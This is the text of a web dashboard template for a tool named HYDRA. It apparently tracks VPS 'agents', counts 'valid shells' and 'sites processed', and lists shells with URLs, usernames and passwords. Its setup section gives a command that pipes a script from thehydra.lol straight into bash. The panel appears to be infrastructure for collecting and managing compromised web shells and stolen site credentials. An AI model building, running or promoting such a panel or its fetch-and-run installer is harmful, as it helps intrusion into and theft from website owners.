Dashboard

{{ stats.vps?.online || 0 }}/{{ stats.vps?.total || 0 }}
VPS Online
{{ stats.shells?.valid || 0 }}
Valid Shells
{{ stats.shells?.total || 0 }}
Total Shells
{{ formatNumber(stats.sites_processed || 0) }}
Sites Processed
Agent Setup

Run this command on your VPS to install the HYDRA agent:

curl -sSL https://thehydra.lol/setup.sh | bash

The agent will auto-register and appear in VPS Agents page.

VPS Agents

Status Hostname IP Specs Shells Last Heartbeat Actions
{{ v.status }} {{ v.hostname || '-' }} {{ v.ip || '-' }} {{ v.cpu_cores }} cores / {{ v.ram_gb }}GB - {{ v.shells_found || 0 }} {{ formatTime(v.last_heartbeat) }}
No VPS registered yet

Shells ({{ shellsTotal }})

URL Username Password Source Status Actions
{{ truncate(s.url, 50) }} {{ s.username }} {{ s.password }} {{ s.source }} {{ s.status }}
No shells found